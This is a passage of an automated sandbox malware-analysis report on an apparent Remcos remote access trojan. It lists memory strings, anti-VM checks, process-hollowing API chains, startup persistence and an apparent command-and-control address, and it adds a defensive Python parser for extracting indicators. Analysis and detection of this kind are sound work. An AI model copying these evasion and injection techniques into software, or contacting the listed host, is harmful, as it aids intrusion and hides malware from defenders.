                    Source: file.exe, 00000000.00000002.2142430073.00000000006E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp Binary or memory string: @HARDWARE\ACPI\DSDT\VBOX__PROCMON_WINDOW_CLASSPROCEXPL21invalid vector<T> subscript?datafmt WAVERIFF.wav%Y-%m-%d %H.%MFreeFrameGetFrameCloseCameraOpenCamera|dmc|[DataStart]%02i:%02i:%02i:%03i [INFO] KeepAlive Enabled! Timeout: %i seconds
                    Source: file.exe, 00000000.00000003.2126925157.0000000000737000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2142430073.000000000073E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2142430073.00000000006E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: SGS.exe, 00000005.00000002.2199326644.00000000006E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                    Source: SGS.exe, 0000000C.00000002.2351272008.0000000000628000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                    Source: SGS.exe, 0000000C.00000002.2351272008.0000000000628000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
                    Source: SGS.exe, 0000000C.00000002.2351272008.0000000000628000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yF
                    Source: file.exe, 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                    Source: file.exe, 00000009.00000003.2304232651.00000000008C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: SGS.exe, 00000005.00000002.2199326644.00000000006E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yJ
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe API call chain: ExitProcess graph end node graph_5-8621
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe API call chain: ExitProcess graph end node graph_5-8476
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Code function: 5_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,5_2_00410065
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Code function: 5_2_0040F984 mov eax, dword ptr fs:[00000030h] 5_2_0040F984
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_004011A3 mov eax, dword ptr fs:[00000030h] 11_2_004011A3
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Code function: 5_2_004105D6 SetUnhandledExceptionFilter,RevertToSelf,5_2_004105D6

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_0040EDE9 __EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,11_2_0040EDE9
                    Source: C:\Users\user\Desktop\file.exe Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Memory written: C:\Users\user\AppData\Local\Temp\SGS.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Memory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Memory written: C:\Users\user\AppData\Local\Temp\SGS.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,GetModuleHandleA,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,Sleep,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, \svchost.exe 11_2_00409B4E
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Code function: 5_2_0041032D lstrcmpiA,LogonUserA,lstrlen,LCMapStringA,LogonUserA,LogonUserA,74701B10,ImpersonateLoggedOnUser,RevertToSelf,746F5030,CloseHandle,5_2_0041032D
                    Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe"
                    Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Process created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exe
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Process created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe"
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Process created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exe
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5249171.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Code function: 5_2_004044D2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_004044D2
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1 (64 bit)|cmd||cmd|8589148160S
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: KRemoteHost|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|-|GB|cmd|WiM
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|bit)|cmd||cmd|8589148160!
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exet|cmd|6109
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\#
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Managert|cmd|C:\Users\alfo
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: KRemoteHost|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|122|cmd|1791967422|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|-
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd||6109e
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|148160
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd||cmd|GB|cmd|Windows 10 Enterpr
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|e|cmd||cmd||cmd|8589148160
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager3i [INFO]
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|-
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manageranager
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manageri [INFO]r
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|t|cmd|6109
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Mise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|122|cmd|1791967422|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|-Host|cmd|610930/alfo
                    Source: logs.dat.3.dr Binary or memory string: [ Program Manager ]
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manageri [INFO] J#!
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|8589148160
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1d|GB|cmd|Wiu
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3i [INFO] #
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3i [INFO] r
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerfonsr
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|109G
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00411005 cpuid 11_2_00411005
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,5_2_004045FD
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,11_2_004093B5
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040FC69 __EH_prolog,GdiplusStartup,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,CreateDirectoryW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,Sleep,GetLocalTime,swprintf,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,Sleep,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,11_2_0040FC69
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0041051E OleInitialize,GetUserNameA,5_2_0041051E
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,5_2_004045FD
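The `|cmd|`-delimited strings above bundle host details (OS string, CPU string, executable path, the logs.dat path under the remcos directory) together with an IPv4 address and a `Remcos-` prefixed identifier. When the same record turns up in a memory dump from another host, the first triage step is to split it and pull out the indicators. The Python below is an added example for this page, not Remcos code and not Joe Sandbox code: it splits a recovered string on the separator and classifies each field by shape alone. The meanings attached to the fields (the large bare integer read as RAM in bytes, the `2.0.4 Pro` field read as a version, the address read as a C2 candidate) are assumptions inferred from the strings in this report, not from any Remcos protocol documentation, and the sample string is a constructed copy of one of the records above.

```python
"""Triage helper for '|cmd|'-delimited Remcos-style memory strings.

Added example for this page; not Remcos code, not Joe Sandbox code. Field
semantics (RAM, version, C2 candidate) are assumptions inferred from the
strings in the report.
"""
import ipaddress
import re
from typing import Dict, List, Set

SEP = "|cmd|"

# Constructed copy of one memory string from the report, trailing fragment kept as-is.
SAMPLE = (
    "Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|"
    "8589148160|cmd|2.0.4 Pro|cmd|"
    "C:\\Users\\user\\AppData\\Roaming\\remcos\\logs.dat|cmd|"
    "C:\\Users\\user\\Desktop\\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|"
    "-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|"
    "C:\\Users\\user\\Desktop\\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|-"
)

WIN_PATH = re.compile(r"^[A-Za-z]:\\")        # drive-letter path
WIN_OS = re.compile(r"^Windows \d+ ")          # e.g. "Windows 10 Enterprise (64 bit)"
VERSION = re.compile(r"^\d+\.\d+\.\d+ \w+$")   # e.g. "2.0.4 Pro"
RAM_FLOOR = 1 << 30                            # assumption: bare integer >= 1 GiB is RAM in bytes


def split_fields(s: str) -> List[str]:
    return s.split(SEP)


def is_ipv4(token: str) -> bool:
    try:
        ipaddress.IPv4Address(token)
        return True
    except ValueError:                         # empty strings and non-dotted tokens land here
        return False


def triage(s: str) -> Dict[str, object]:
    """Classify each field of one record by shape; unknown fields are ignored."""
    fields = split_fields(s)
    ipv4: List[str] = []
    paths: List[str] = []
    os_name = cpu = tag = version = None
    ram = None
    for f in fields:
        if is_ipv4(f):
            ipv4.append(f)
        elif WIN_PATH.match(f):
            paths.append(f)
        elif WIN_OS.match(f):
            os_name = f
        elif "CPU" in f and "@" in f:
            cpu = f
        elif f.startswith("Remcos-"):
            tag = f
        elif VERSION.match(f):
            version = f
        elif f.isdigit() and int(f) >= RAM_FLOOR:
            ram = int(f)
    return {
        "field_count": len(fields), "ipv4": ipv4, "paths": paths, "os": os_name,
        "cpu": cpu, "tag": tag, "version": version, "ram_bytes": ram,
    }


def c2_candidates(strings: List[str]) -> Set[str]:
    """Every IPv4 address found in separator-bearing strings from a dump."""
    found: Set[str] = set()
    for s in strings:
        if SEP in s:
            found.update(triage(s)["ipv4"])   # type: ignore[arg-type]
    return found


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key:12} {value}")
```

Feeding `strings -n 8` output of a dump into `c2_candidates` gives the address list to pivot on; the shape-based checks deliberately do not depend on field position, so partially overwritten records such as the truncated ones above still yield whatever fields survived.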

                    Stealing of Sensitive Information

                    Source: Yara match -- File source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match -- File source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match -- File source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
